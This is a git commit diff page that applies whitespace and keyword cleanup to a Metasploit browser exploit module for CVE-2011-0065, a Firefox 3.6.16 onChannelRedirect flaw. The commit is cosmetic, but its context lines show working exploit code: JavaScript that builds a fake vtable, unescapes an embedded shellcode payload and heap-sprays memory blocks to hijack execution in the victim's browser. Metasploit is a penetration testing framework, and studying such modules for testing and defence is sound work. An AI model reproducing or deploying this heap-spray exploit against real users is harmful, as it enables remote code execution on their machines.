Whitespace and keyword cleanup
parent
5d359785ae
commit
618097ba3d
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -16,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::FF,
|
||||
:ua_minver => "3.6.16",
|
||||
|
@ -43,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Rh0', # windows metasploit module
|
||||
'argp <argp[at]census-labs.com>' # mac os x target
|
||||
],
|
||||
'Version' => "$Revision$",
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2011-0065'],
|
||||
|
@ -69,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'May 10 2011'
|
||||
))
|
||||
))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
@ -110,9 +106,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#{js_element_name}.onChannelRedirect(null, new Object, 0)
|
||||
|
||||
#{js_obj_addr_name} = unescape("\x00#{fakevtable}");
|
||||
|
||||
|
||||
var #{js_sc_name} = unescape("#{escaped_payload}");
|
||||
|
||||
|
||||
var #{js_ret_addr_name} = unescape("#{fakefunc}");
|
||||
|
||||
while(#{js_ret_addr_name}.length < 0x120)
|
||||
|
@ -130,8 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#{js_final_chunk_name} += #{js_final_chunk_name};
|
||||
}
|
||||
|
||||
var #{js_block_name} = #{js_final_chunk_name}.substring(0,
|
||||
0x80000 - #{js_sc_name}.length - 0x24 / 2 - 0x4 / 2 - 0x2 / 2);
|
||||
var #{js_block_name} = #{js_final_chunk_name}.substring(0, 0x80000 - #{js_sc_name}.length - 0x24 / 2 - 0x4 / 2 - 0x2 / 2);
|
||||
|
||||
#{js_array_name} = new Array()
|
||||
|
||||
|
|
Loading…
Reference in New Issue